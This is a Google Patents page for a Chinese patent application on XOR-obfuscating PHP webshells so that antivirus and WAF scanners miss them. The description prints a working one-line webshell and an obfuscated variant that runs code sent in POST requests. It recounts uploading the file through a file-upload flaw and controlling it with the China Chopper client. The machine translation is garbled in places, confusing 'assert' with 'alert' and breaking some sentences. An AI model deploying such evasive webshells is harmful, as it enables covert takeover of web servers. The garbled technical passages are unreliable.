CN112099846A - Webshell killing-free method based on random character XOR operation - Google Patents

Webshell killing-free method based on random character XOR operation Download PDF

Info

Publication number
CN112099846A
CN112099846A CN202010856314.7A CN202010856314A CN112099846A CN 112099846 A CN112099846 A CN 112099846A CN 202010856314 A CN202010856314 A CN 202010856314A CN 112099846 A CN112099846 A CN 112099846A
Authority
CN
China
Prior art keywords
killing
webshell
characters
sensitive
method based
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202010856314.7A
Other languages
Chinese (zh)
Inventor
吴建亮
胡鹏
梁志颖
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Guangzhou Jeeseen Network Technologies Co Ltd
Original Assignee
Guangzhou Jeeseen Network Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Guangzhou Jeeseen Network Technologies Co Ltd filed Critical Guangzhou Jeeseen Network Technologies Co Ltd
Priority to CN202010856314.7A priority Critical patent/CN112099846A/en
Publication of CN112099846A publication Critical patent/CN112099846A/en
Pending legal-status Critical Current

Links

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F8/00Arrangements for software engineering
    • G06F8/70Software maintenance or management
    • G06F8/72Code refactoring
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/556Detecting local intrusion or implementing counter-measures involving covert channels, i.e. data leakage between processes
    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements

Landscapes

  • Engineering & Computer Science (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Computer Hardware Design (AREA)
  • Virology (AREA)
  • General Health & Medical Sciences (AREA)
  • Health & Medical Sciences (AREA)
  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and can monitor the searching and killing system; the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated. The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The webshell file with the killing-free effect is flexible to generate and various in forming mode. The benefits of the red and blue confrontation on the network security are improved, the personnel quality of the network security is further improved, and the network security is better protected.

Description

Webshell killing-free method based on random character XOR operation
Technical Field
The invention relates to the technical field of network security, in particular to a webshell killing-free method based on random character exclusive-or operation.
Background
With the development of internet technology, network security is more and more important, and the red-blue confrontation between network security is more and more important. The red and blue team is one of the important protection means for enterprises or organizations, and the result is to cope with the increasing security holes and the complicated and diversified network attacks. Only after the enterprises continuously resist red and blue to form a loophole closed loop, a powerful security defense system can be constructed.
The red and blue countermeasures are a continuous process, the attack means of enemies are continuously changed and continuously improved, and the defense of the enemies is continuously improved so as to ensure the safety of the network. Often, it is especially important for the red team to get a boundary entry to the web, and the webshell also becomes the core for the red team to maintain the boundary rights. For the traditional webshell, all large antivirus software and a website application level intrusion prevention system WAF strictly prevent staring, and effectively reduce the attack efficiency of an attacker.
In the actual red and blue countermeasures, the attack performance of an attacking party is continuously improved, and the method has very important significance on the network security of enterprises or organizations. The attack performance of the attacker is improved, and the corresponding improvement of the performance of the defense is facilitated. Therefore, the attack performance of the attacker is also an important direction for the research in the field of network security. How to be able to "kill" the webshell quickly through variant codes also becomes one of the requisite weapons for the red team.
Therefore, it is necessary to provide a webshell killing-free method based on random character xor operation to overcome the deficiencies of the prior art.
Disclosure of Invention
The invention aims to avoid the defects of the prior art and provides a webshell killing-free method and a test method based on random character XOR operation, which can hide sensitive keywords and enable the monitoring of a killing system to be realized.
The above object of the present invention is achieved by the following technical means:
the webshell killing-free method based on the random character XOR operation is provided, sensitive keywords concerned by a searching and killing system are represented by representation characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the representation characters and can monitor the searching and killing system;
the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated.
Preferably, the sensitive key is a sensitive function or key.
Preferably, the sensitive key is an eval or alert function.
Preferably, in the webshell killing-free method based on the random character exclusive-or operation, the first random extraction of the characterization characters is performed with exclusive-or processing with each character in the sensitive keywords respectively to obtain a first exclusive-or expression, and then the first expression and the first random extraction of the characterization characters are performed with exclusive-or expression to construct the webshell file of the PHP script.
In another preferred embodiment, in the webshell killing-free method based on random character xor operation, each character in the characterization sensitive keyword is obtained through character xor.
Further, in the webshell antivirus method based on the random character exclusive-or operation, the searching and killing system is antivirus software or a website application level intrusion prevention system.
Further, the webshell killing-free method based on the random character exclusive-or operation is provided with a random character pool, and random characters are extracted from the random character pool.
According to the webshell killing-free method based on the random character XOR operation, sensitive keywords concerned by the searching and killing system are represented by the representation characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the representation characters and can monitor the searching and killing system; the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated. The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Detailed Description
The invention is further illustrated by the following examples.
Example 1.
A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, and a webshell file of a PHP script is constructed, so that the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and can monitor the searching and killing system.
The representation characters are different from the expression characters forming the sensitive keywords, the representation characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the representation characters is calculated.
The antivirus system is antivirus software or a website application level intrusion prevention system. In the defense process, the searching and killing software usually checks the sensitive keywords, and if the sensitive keywords exist in the file, the searching and killing system can prevent the network security risk. If there are no sensitive keywords in the webshell file or the like, a pass is given by the check.
The technical scheme of the invention utilizes the representation characters to express in a mode different from the sensitive keywords, and the representation characters have no sensitive keywords, so that the monitoring of a searching and killing system can be realized. The result obtained after the characteristic characters are subjected to XOR operation is just a sensitive keyword, and the performance of the original file can be kept. Therefore, the method can achieve the killing-free effect of the webshell and maintain the performance of the original file.
The sensitive key is a sensitive function or a key, and specifically may be an eval or alert function.
Among the logical operations, in addition to AND OR, there is an XOR operation, called "XOR operation" in chinese, defined as: if the two values are the same, false is returned, otherwise true is returned. That is, the XOR may be used to determine whether the two values are different.
true XOR true//false
false XOR false//false
true XOR false//true
true XOR false//true。
The XOR operation has one feature: if an XOR is performed twice in succession on a value, the value itself is returned.
// first XOR// second XOR
1010^1111//0101 0101^1111//1010
For the reversibility of the XOR operation, the killing-free of the webshell is realized by using the point.
The core of the webshell of the PHP is the eval function and the alert function, and the two sensitive functions or keywords are also the focus of the traditional antivirus software and WAF.
The webshell killing-free method based on the random character XOR operation can randomly extract the characterization characters for the first time to be XOR-processed with each character in the sensitive keywords respectively to obtain a primary XOR expression, and then XOR-express the primary expression and the characterization characters randomly extracted for the first time to construct a webshell file of the PHP script.
For example, in one embodiment:
originally, the method is a function of alert, and a character string with the length of six digits is formed by randomly extracting characters and symbols to construct a webshell file of the PHP. In PHP:
Figure BDA0002646540640000041
then the traditional webshell:
<?PHP assert($_POST[123]);?>
is structured as follows:
<?PHP$a='IWP"NK'^'($#G<?';$a($_POST[123]);?>
in <? PHP alert ($ _ POST [123 ]); is there a In the method, due to the fact that the alarm is contained, the alarm is focused by antivirus software and WAF, and cannot pass safety detection. Is structured as <? The method comprises the steps of providing a chip, a.
In this example, for each character in the sensitive keyword to be constructed, the character is subjected to xor processing with a random character to obtain a first xor expression ' IWP "NK ', and then the first xor expression ' IWP" NK ' is subjected to xor processing with a first randomly extracted token character ' ($ # G <.
And (3) carrying out actual scene application in the example, and verifying the validity:
the Hongyu finds a web site with any file uploading vulnerability, and can upload the webshell file: php.
The code is traditional webshell: <? PHP alert ($ _ POST [123 ]); is there a < CHEM > A
Php is found to be killed by the antivirus software.
Constructing a killing-free webshell file shell2.php by using an exclusive-or operation principle: <? PHP $ a ═ IWP "NK '^' ($ # G <.
Uploading the Shell2.php to a web site with a vulnerability, and displaying the soft killing result that the scanning is not at risk. And a Chinese kitchen knife is connected with the webshell, so that the uploaded Shell2.php file can be normally accessed.
The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Example 2.
A webshell killing-free method based on random character XOR operation has the same other characteristics as embodiment 1, except that: the modes of constructing the webshell killing-free file through the XOR operation are different.
And obtaining each character in the characterization sensitive keyword through character XOR. Taking eval as an example, in this embodiment, two character representation evals of "e", "v", "a", and "l" can be obtained through xor operation are sequentially and randomly extracted, and a webshell file of the PHP is constructed.
Since there are a plurality of sets of character pairs capable of obtaining "e" by the exclusive-or operation and a plurality of sets of character pairs capable of obtaining "v" by the exclusive-or operation, … …, there are various ways of constructing sensitive joint words expressed by the exclusive-or relationship and there is randomness. Therefore, the webshell files of the PHP constructed at different times have various forms, and have diversity and randomness. Regardless of how the character is extracted, it is only necessary that the result after the final exclusive-or operation is equal to assert or eval.
The webshell killing-free method based on the random character XOR operation can set a random character pool, extracts random characters from the random character pool, and is convenient for constructing the XOR relation.
The method provided by the invention is used for verifying a plurality of webshell killing-free files formed by adopting the method, and the result is displayed and can be monitored by a searching and killing system.
The invention hides the sensitive keywords by the representation characters, so that the monitoring of a searching and killing system can be realized. The generation of the webshell file is randomized, the generation of the webshell file with the killing-free effect is flexible, and the forming modes are various. The attack efficiency of the network attacker is greatly improved, a defense requirement is provided for the defender, benefits of the red and blue countermeasures on network safety are improved conveniently, personnel quality of the network safety is further improved, and the network safety is better protected.
Finally, it should be noted that the above embodiments are only used for illustrating the technical solutions of the present invention and not for limiting the protection scope of the present invention, and although the present invention is described in detail with reference to the preferred embodiments, it should be understood by those skilled in the art that modifications or equivalent substitutions can be made on the technical solutions of the present invention without departing from the spirit and scope of the technical solutions of the present invention.

Claims (7)

1. A webshell killing-free method based on random character XOR operation is characterized in that sensitive keywords concerned by a searching and killing system are represented by characteristic characters, a webshell file of a PHP script is constructed, and the searching and killing system cannot obtain the sensitive keywords through the characteristic characters and is monitored by the searching and killing system;
the characteristic characters are different from expression characters forming the sensitive keywords, the characteristic characters contain an exclusive-or relation, and the expression characters of the sensitive keywords are obtained after the exclusive-or relation in the characteristic characters is calculated.
2. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 1, wherein the sensitive keyword is a sensitive function or a keyword.
3. The webshell suicide avoiding method based on the random character exclusive-or operation as claimed in claim 2, wherein the sensitive keyword is eval or alert function.
4. The webshell killing-free method based on random character XOR operation of claim 3, wherein the first random extraction of the characterization characters is performed with XOR processing with each character in the sensitive keywords to obtain a first XOR expression, and then the first expression is performed with XOR expression with the first random extraction of the characterization characters to construct the webshell file of the PHP script.
5. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 3, wherein each character in the characterization sensitive keyword is obtained by character exclusive-or.
6. The webshell exempting method based on random character XOR operation of any one of claims 1 to 5, wherein the killing system is antivirus software or a website application level intrusion prevention system.
7. The webshell killing-free method based on the random character exclusive-or operation as claimed in claim 6, wherein a random character pool is provided, and random characters are extracted from the random character pool.
CN202010856314.7A 2020-08-24 2020-08-24 Webshell killing-free method based on random character XOR operation Pending CN112099846A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202010856314.7A CN112099846A (en) 2020-08-24 2020-08-24 Webshell killing-free method based on random character XOR operation

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202010856314.7A CN112099846A (en) 2020-08-24 2020-08-24 Webshell killing-free method based on random character XOR operation

Publications (1)

Publication Number Publication Date
CN112099846A true CN112099846A (en) 2020-12-18

Family

ID=73754178

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202010856314.7A Pending CN112099846A (en) 2020-08-24 2020-08-24 Webshell killing-free method based on random character XOR operation

Country Status (1)

Country Link
CN (1) CN112099846A (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN1604585A (en) * 2003-09-30 2005-04-06 华为技术有限公司 Method for security transmission of card number information from IP terminal to soft switch
CN104933361A (en) * 2015-06-05 2015-09-23 浪潮电子信息产业股份有限公司 Device and method for protecting login password
CN106919811A (en) * 2015-12-24 2017-07-04 阿里巴巴集团控股有限公司 File test method and device
CN108259619A (en) * 2018-01-30 2018-07-06 成都东软学院 Network request means of defence and network communicating system
US20190141075A1 (en) * 2017-11-09 2019-05-09 Monarx, Inc. Method and system for a protection mechanism to improve server security
DE102018102386A1 (en) * 2018-02-02 2019-08-08 Infineon Technologies Ag Method for transmitting data, method for receiving data, master, slave, and master-slave system
CN111163094A (en) * 2019-12-31 2020-05-15 奇安信科技集团股份有限公司 Network attack detection method, network attack detection device, electronic device, and medium

Patent Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN1604585A (en) * 2003-09-30 2005-04-06 华为技术有限公司 Method for security transmission of card number information from IP terminal to soft switch
CN104933361A (en) * 2015-06-05 2015-09-23 浪潮电子信息产业股份有限公司 Device and method for protecting login password
CN106919811A (en) * 2015-12-24 2017-07-04 阿里巴巴集团控股有限公司 File test method and device
US20190141075A1 (en) * 2017-11-09 2019-05-09 Monarx, Inc. Method and system for a protection mechanism to improve server security
CN108259619A (en) * 2018-01-30 2018-07-06 成都东软学院 Network request means of defence and network communicating system
DE102018102386A1 (en) * 2018-02-02 2019-08-08 Infineon Technologies Ag Method for transmitting data, method for receiving data, master, slave, and master-slave system
CN111163094A (en) * 2019-12-31 2020-05-15 奇安信科技集团股份有限公司 Network attack detection method, network attack detection device, electronic device, and medium

Similar Documents

Publication Publication Date Title
Gupta et al. A literature survey on social engineering attacks: Phishing attack
Almeshekah et al. Cyber security deception
Sabillon et al. Cybercrime and cybercriminals: A comprehensive study
Medvet et al. Visual-similarity-based phishing detection
Rao et al. A computer vision technique to detect phishing attacks
Sabillon et al. Cybercriminals, cyberattacks and cybercrime
Almeshekah et al. Improving security using deception
Chen et al. Intrusion detection
Van Heerden et al. Classifying network attack scenarios using an ontology
Huang et al. Countermeasure techniques for deceptive phishing attack
Hansman A taxonomy of network and computer attack methodologies
Mishra et al. Hybrid solution to detect and filter zero-day phishing attacks
Rai et al. A study on cyber crimes cyber criminals and major security breaches
CN113645181B (en) Distributed protocol attack detection method and system based on isolated forest
Telo Supervised machine learning for detecting malicious URLs: an evaluation of different models
Veprytska et al. AI powered attacks against AI powered protection: Classification, scenarios and risk analysis
Hashem et al. A proposed technique for simultaneously detecting DDoS and SQL injection attacks
Kunwar et al. Framework to detect malicious codes embedded with JPEG images over social networking sites
Goyal et al. Cyber crime in the society: Security issues, preventions and challenges
Rubenstein Nation state cyber espionage and its impacts
CN112099846A (en) Webshell killing-free method based on random character XOR operation
Soufiane et al. SaaS Cloud Security: Attacks and Proposedsolutions
Venkatesh et al. Identification and isolation of crypto ransomware using honeypot
Almeshekah et al. The case of using negative (deceiving) information in data protection
Gao et al. A cyber deception defense method based on signal game to deal with network intrusion

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication
RJ01 Rejection of invention patent application after publication

Application publication date: 20201218